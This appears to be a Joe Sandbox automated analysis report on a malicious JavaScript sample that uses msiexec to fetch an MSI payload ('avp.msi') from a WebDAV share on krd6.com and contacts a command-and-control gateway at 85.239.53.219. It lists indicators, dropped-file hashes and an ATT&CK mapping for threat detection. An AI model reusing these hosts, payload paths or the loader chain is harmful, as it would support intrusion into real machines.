Source: wscript.exe, 00000000.00000003.2093161358.00000277F4576000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181457815.00000277F6800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F4576000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2098671961.00000277F4576000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F4576000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F4576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 87.249.49.206 80Jump to behavior
JavaScript file contains Antivirus product strings
Source: Doc_m42_81h118103-88o62135w8623-1999q9.jsInitial file: avast, avira, eset, sophos
Source: C:\Windows\System32\msiexec.exeQueries volume information: \Device\Mup\krd6.com@80\share\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Opens network shares
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\shareJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\avp.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: \\krd6.com@80\share\Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting		1
Replication Through Removable Media		11
Windows Management Instrumentation		12
Scripting		11
Process Injection		21
Masquerading		OS Credential Dumping1
Network Share Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture15
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets11
Peripheral Device Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync14
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Doc_m42_81h118103-88o62135w8623-1999q9.js7%VirustotalBrowse
Doc_m42_81h118103-88o62135w8623-1999q9.js8%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll11%ReversingLabs
C:\Users\user\AppData\Local\sharepoint\forcedelctl.dll13%VirustotalBrowse
C:\Windows\Installer\MSIE1A8.tmp0%ReversingLabs
C:\Windows\Installer\MSIE1A8.tmp0%VirustotalBrowse
C:\Windows\Installer\MSIE3CC.tmp0%ReversingLabs
C:\Windows\Installer\MSIE3CC.tmp0%VirustotalBrowse
C:\Windows\Installer\MSIE3ED.tmp0%ReversingLabs
C:\Windows\Installer\MSIE3ED.tmp0%VirustotalBrowse
C:\Windows\Installer\MSIE40D.tmp0%ReversingLabs
C:\Windows\Installer\MSIE40D.tmp0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
krd6.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crl.v0%URL Reputationsafe
http://85.239.53.219/api/gateway0%VirustotalBrowse
http://krd6.com/share1%VirustotalBrowse
http://krd6.com/1%VirustotalBrowse
http://krd6.com/share/avp.msi1%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
krd6.com
87.249.49.206
truetrueunknown
api.ipify.org
104.26.13.205
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://api.ipify.org/false
      		high
      http://85.239.53.219/api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasksfalse
        		unknown
        http://85.239.53.219/api/gatewayfalseunknown
        http://krd6.com/share/avp.msitrueunknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://krd6.com/sharekwscript.exe, 00000000.00000003.2180880980.00000277F44AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181241937.00000277F44B0000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          https://www.thawte.com/cps0/62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drfalse
            		high
            http://krd6.com/sharewscript.exe, 00000000.00000002.2181533993.00000277F6923000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180795293.00000277F6923000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            http://ocsp.digicwscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://www.thawte.com/repository0W62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drfalse
                		high
                https://www.advancedinstaller.com62df95.msi.8.dr, MSIE3CC.tmp.8.dr, MSIE3ED.tmp.8.dr, MSIE40D.tmp.8.dr, MSIE1A8.tmp.8.drfalse
                  		high
                  http://krd6.com/wscript.exe, 00000000.00000002.2181533993.00000277F6906000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180795293.00000277F6904000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://secure.globalsignwscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://ocsp.digic3Vwscript.exe, 00000000.00000003.2180659612.00000277F455D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2181258370.00000277F455D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://crl.vwscript.exe, 00000000.00000002.2181258370.00000277F44D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099810104.00000277F44B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2180659612.00000277F44CD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      87.249.49.206
                      		krd6.comRussian Federation
                      		31323UNNET-ASRUtrue
                      85.239.53.219
                      		unknownRussian Federation
                      		134121RAINBOW-HKRainbownetworklimitedHKfalse
                      104.26.13.205
                      		api.ipify.orgUnited States
                      		13335CLOUDFLARENETUSfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1427450
                      Start date and time:2024-04-17 16:50:41 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 23s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Without Instrumentation
                      Number of analysed new started processes analysed:11
                      Number of new started drivers analysed:1
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Doc_m42_81h118103-88o62135w8623-1999q9.js
                      Detection:MAL
                      Classification:mal84.spyw.evad.winJS@5/18@2/3
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .js

                      Warnings

                      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 104.18.21.226, 104.18.20.226, 199.232.214.172
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, cdn.globalsigncdn.com.cdn.cloudflare.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, secure.globalsign.com, fe3cr.delivery.mp.microsoft.com, global.prd.cdn.globalsign.com
                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:51:29API Interceptor3x Sleep call for process: wscript.exe modified
                      16:51:45API Interceptor8x Sleep call for process: msiexec.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      85.239.53.219avp.msiGet hashmaliciousUnknownBrowse
                      • 85.239.53.219/api/fb39654b-9cf5-cff8-3210-0600dabfd565/tasks
                      MenuEx.dllGet hashmaliciousUnknownBrowse
                      • 85.239.53.219/api/488198d9-c268-6844-efbc-720e2aee69aa/tasks
                      MenuEx.dllGet hashmaliciousUnknownBrowse
                      • 85.239.53.219/api/488198d9-c268-6844-efbc-720e2aee69aa/tasks
                      sharepoint.msiGet hashmaliciousUnknownBrowse
                      • 85.239.53.219/api/488198d9-c268-6844-efbc-720e2aee69aa/tasks
                      Incident_Report_Harassment.docGet hashmaliciousUnknownBrowse
                      • 85.239.53.219/api/eae0b293-9be2-4432-c40e-c9c6b1b9d7a1/tasks
                      104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                      • api.ipify.org/
                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                      • api.ipify.org/?format=json
                      ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                      • api.ipify.org/?format=json
                      Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/?format=json
                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                      • api.ipify.org/
                      SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                      • api.ipify.org/

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      api.ipify.orgavp.msiGet hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      SHIPMENT ADVICE FOR CLEARTEX.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.13.205
                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.12.205
                      67002314579XX.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.12.205
                      draft bl_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • 104.26.13.205
                      invoice1337.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.74.152
                      signed documents and BOL.exeGet hashmaliciousAgentTeslaBrowse
                      • 104.26.13.205
                      P..O PDF.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.74.152
                      APR 20204 RFQ .xlsx.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                      • 172.67.74.152
                      Quotation 22001625_REV001.exeGet hashmaliciousAgentTeslaBrowse
                      • 172.67.74.152
                      bg.microsoft.map.fastly.netRFQ.xlsGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      https://flow.page/resourcepro.comGet hashmaliciousHTMLPhisherBrowse
                      • 199.232.214.172
                      https://tibusiness.cl/Causarol.rarGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      Postman_Json_Masivo_vConectividad.xlsmGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                      • 199.232.214.172
                      cs2aimwallhack.exeGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 199.232.214.172
                      EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 199.232.214.172
                      https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://liceogalois.co/w712969.shtml&ved=2ahUKEwiQ2rPsxpGFAxXETEEAHemID4gQFnoECBAQAQGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      lXxwrV8dZ2.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                      • 199.232.214.172

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUShttps://bookmarkover.com/Ma2V2aW4ud2F0dEBzZWN1cml0eWJlbmVmaXQuY29tGet hashmaliciousHTMLPhisherBrowse
                      • 104.17.245.203
                      avp.msiGet hashmaliciousUnknownBrowse
                      • 172.67.74.152
                      https://training.vitalsmarts.com/win/crucial-conversations-mastering-dialogueGet hashmaliciousUnknownBrowse
                      • 172.66.42.248
                      DETAILS.docx.docGet hashmaliciousRemcosBrowse
                      • 104.21.84.67
                      RFQ.xlsGet hashmaliciousUnknownBrowse
                      • 172.67.206.230
                      https://johns-organization-77.gitbook.io/shareddocGet hashmaliciousHTMLPhisherBrowse
                      • 104.16.117.116
                      RFQ.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.15.201
                      RFQ.xlsGet hashmaliciousUnknownBrowse
                      • 104.21.15.201
                      file.exeGet hashmaliciousRisePro StealerBrowse
                      • 104.26.4.15
                      https://flow.page/resourcepro.comGet hashmaliciousHTMLPhisherBrowse
                      • 104.18.32.137
                      RAINBOW-HKRainbownetworklimitedHKavp.msiGet hashmaliciousUnknownBrowse
                      • 85.239.53.219
                      MenuEx.dllGet hashmaliciousUnknownBrowse
                      • 85.239.53.219
                      MenuEx.dllGet hashmaliciousUnknownBrowse
                      • 85.239.53.219
                      sharepoint.msiGet hashmaliciousUnknownBrowse
                      • 85.239.53.219
                      mpsl.elfGet hashmaliciousGafgytBrowse
                      • 85.239.34.72
                      mips.elfGet hashmaliciousGafgytBrowse
                      • 85.239.34.72
                      Incident_Report_Harassment.docGet hashmaliciousUnknownBrowse
                      • 85.239.53.219
                      kUnmzW2aeD.elfGet hashmaliciousUnknownBrowse
                      • 85.239.34.72
                      LSAfHR8u3P.elfGet hashmaliciousGafgytBrowse
                      • 85.239.34.72
                      CMofmkwDvW.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 85.239.33.129
                      UNNET-ASRUBUBPZkk1Sm.elfGet hashmaliciousMiraiBrowse
                      • 87.249.39.194
                      he4MyXvFE7.elfGet hashmaliciousMiraiBrowse
                      • 87.249.39.185
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 87.249.44.90
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 87.249.44.90
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 87.249.44.90
                      file.exeGet hashmaliciousGlupteba, VidarBrowse
                      • 87.249.44.90
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 87.249.44.90
                      http://skladtandem.ru/bitrix/admin/mrt/redirect.php?login=tendai@transafricamedicals.co.za&source=gmail&ust=1691478366880000&usg=AOvVaw3Yg-fX-mtHN-vCYoBB8D5QGet hashmaliciousUnknownBrowse
                      • 87.249.43.162
                      oZasOwbAre.elfGet hashmaliciousMiraiBrowse
                      • 87.249.39.175
                      wuka9aK727.elfGet hashmaliciousMiraiBrowse
                      • 92.255.66.12

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      a0e9f5d64349fb13191bc781f81f42e1avp.msiGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      RFQ.xlsGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      file.exeGet hashmaliciousRisePro StealerBrowse
                      • 104.26.13.205
                      Postman_Json_Masivo_vConectividad.xlsmGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      Consignee-returns-spreadsheet.xlsGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      hcjt7Ajt5t.exeGet hashmaliciousLummaCBrowse
                      • 104.26.13.205
                      2llKbb9pR7.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                      • 104.26.13.205
                      Hays_compiled_documents.ZIP.jsGet hashmaliciousUnknownBrowse
                      • 104.26.13.205
                      MdeeRbWvqe.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, RedLine, SmokeLoaderBrowse
                      • 104.26.13.205
                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                      • 104.26.13.205

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Windows\Installer\MSIE1A8.tmpavp.msiGet hashmaliciousUnknownBrowse
                        sharepoint.msiGet hashmaliciousUnknownBrowse
                          slack.msiGet hashmaliciousBazar LoaderBrowse
                            out_bdrts.jsGet hashmaliciousBazar LoaderBrowse
                              font.msiGet hashmaliciousBazar LoaderBrowse
                                Letter_q50_63b944998-11n0283407179-6803z4.jsGet hashmaliciousUnknownBrowse
                                  upd.msiGet hashmaliciousUnknownBrowse
                                    Doc_i93_65b929565-14q83944h2246-4336m9.jsGet hashmaliciousUnknownBrowse
                                      Doc_i93_65b929565-14q83944h2246-4336m9.jsGet hashmaliciousUnknownBrowse
                                        SecuriteInfo.com.Trojan.Generic.35319809.8233.9994.msiGet hashmaliciousUnknownBrowse
                                          C:\Users\user\AppData\Local\sharepoint\forcedelctl.dllavp.msiGet hashmaliciousUnknownBrowse
                                            C:\Windows\Installer\MSIE3CC.tmpavp.msiGet hashmaliciousUnknownBrowse
                                              sharepoint.msiGet hashmaliciousUnknownBrowse
                                                slack.msiGet hashmaliciousBazar LoaderBrowse
                                                  out_bdrts.jsGet hashmaliciousBazar LoaderBrowse
                                                    font.msiGet hashmaliciousBazar LoaderBrowse
                                                      Letter_q50_63b944998-11n0283407179-6803z4.jsGet hashmaliciousUnknownBrowse
                                                        upd.msiGet hashmaliciousUnknownBrowse
                                                          Doc_i93_65b929565-14q83944h2246-4336m9.jsGet hashmaliciousUnknownBrowse
                                                            Doc_i93_65b929565-14q83944h2246-4336m9.jsGet hashmaliciousUnknownBrowse
                                                              SecuriteInfo.com.Trojan.Generic.35319809.8233.9994.msiGet hashmaliciousUnknownBrowse

                                                                Created / dropped Files

                                                                C:\Config.Msi\62df97.rbs

                                                                Download File
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):1344
                                                                Entropy (8bit):5.672510398117732
                                                                Encrypted:false
                                                                SSDEEP:24:WgCsMDlI6kcDd6kzFHzM+LzyLqzHpURW1g9PaKFPwaiRaizDhiS31hW1c:WOMqK8khHIkWLqtTXuP1isizD8Slac
                                                                MD5:CF60C7EC8249C599AC267B8756E2E3C6
                                                                SHA1:2B246DB054B72A09366859E16A2E7544CB01FEB8
                                                                SHA-256:DC56923CF9BBEB0AD738C89AC3CF645F83C4C96A87EE0A48D01BD332704CA848
                                                                SHA-512:DFB4438291F03596937E5A3A75E2EA2D6D084ED29B9196E8AF907E035FAEBCC17F692F57ED6348C0480E4BE7247E3B9F8A6849A4F40FC13A77607B726DABDE89
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...@IXOS.@.....@w..X.@.....@.....@.....@.....@.....@......&.{52EF198D-0C6C-406A-803F-F86D93DD7930}..GeoTdata..avp.msi.@.....@.....@.....@........&.{117CFEB2-6376-4FA5-ACE4-CD1494F2E3DD}.....@.....@.....@.....@.......@.....@.....@.......@......GeoTdata......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@......&.{698ED6C9-206D-4BB6-BF3D-8CF082F29629}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@......&.{166D45B5-D23D-467B-BBDE-9EF5A3B91CB0}&.{52EF198D-0C6C-406A-803F-F86D93DD7930}.@........CreateFolders..Creating folders..Folder: [1]#.8.C:\Users\user\AppData\Roaming\Since Flawer\GeoTdata\.@....#.+.C:\Users\user\AppData\Local\New Folder\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..+.C:\Users

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                Category:dropped
                                                                Size (bytes):69993
                                                                Entropy (8bit):7.99584879649948
                                                                Encrypted:true
                                                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:Certificate, Version=3
                                                                Category:dropped
                                                                Size (bytes):1398
                                                                Entropy (8bit):7.676048742462893
                                                                Encrypted:false
                                                                SSDEEP:24:ujsZPSIPSUcnA3/46giyfV4Hxk7P3Gus6acCQ4CXmW5mOgs:ujul2nQ4XfVkk7P3g6dB42mVs
                                                                MD5:E94FB54871208C00DF70F708AC47085B
                                                                SHA1:4EFC31460C619ECAE59C1BCE2C008036D94C84B8
                                                                SHA-256:7B9D553E1C92CB6E8803E137F4F287D4363757F5D44B37D52F9FCA22FB97DF86
                                                                SHA-512:2E15B76E16264ABB9F5EF417752A1CBB75F29C11F96AC7D73793172BD0864DB65F2D2B7BE0F16BBBE686068F0C368815525F1E39DB5A0D6CA3AB18BE6923B898
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:0..r0..Z.......vS..uFH....JH:N.0...*.H........0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450...200318000000Z..450318000000Z0S1.0...U....BE1.0...U....GlobalSign nv-sa1)0'..U... GlobalSign Code Signing Root R450.."0...*.H.............0.........-.0.z.=.r.:K..a....g.7..~.....C..E..cW]....%..h.K..K.J...j..a'..D...?".O.....(..].Y.......,.3$.P:A..{.M.X8.........,..C...t...{.3..Yk....Z.{..U......L...u.o.a.tD....t..h.l&>.......0....|U..p\$x %.gg...N4.kp..8...........;.gC....t./.....7=gl.E\.a.A.....w.FGs.....+....X.W..Z..%....r=....;D.&.........E.......Bng~B.qb...`.d....!N+.mh...tsg1z...yn|..~FoM..+."D...7..aW...$..1s..5WG~.:E.-.Q.....7.e...k.w....?.0.o1..@........PvtY..m.2...~...u..J.,....+B..j6..L.............:.c...$d.......B0@0...U...........0...U.......0....0...U.........F...x9...C.VP..;0...*.H.............^+.t.4D_vH(@....n..%.{...=..v...0 ..`.....x.+.2..$.RR......9n....CA}..[.]...&..tr&....=;jR.<../.{.3.E.....

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                Download File
                                                                Process:C:\Windows\System32\wscript.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):330
                                                                Entropy (8bit):3.2361171502523645
                                                                Encrypted:false
                                                                SSDEEP:6:kK2XlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:UlbkPlE99SNxAhUeVLVt
                                                                MD5:4508B1252AE4A5F801F21E789F2B1F4D
                                                                SHA1:96006B1975D97D5157ECEC41B1DE241920493FC1
                                                                SHA-256:C0709DF44A96258B6739E296D3AF0C9B954B1CD645699571D1B3AD4AB655CA4C
                                                                SHA-512:03BC4F3BBC4853B3AAF70BA63C91DF0B992DA28A0E1C0EC03074A4DEC245EDA0B95193E75E7FC9C12519049397B81303762FFA0F53D2983B671FD9329D271646
                                                                Malicious:false
                                                                Reputation:low
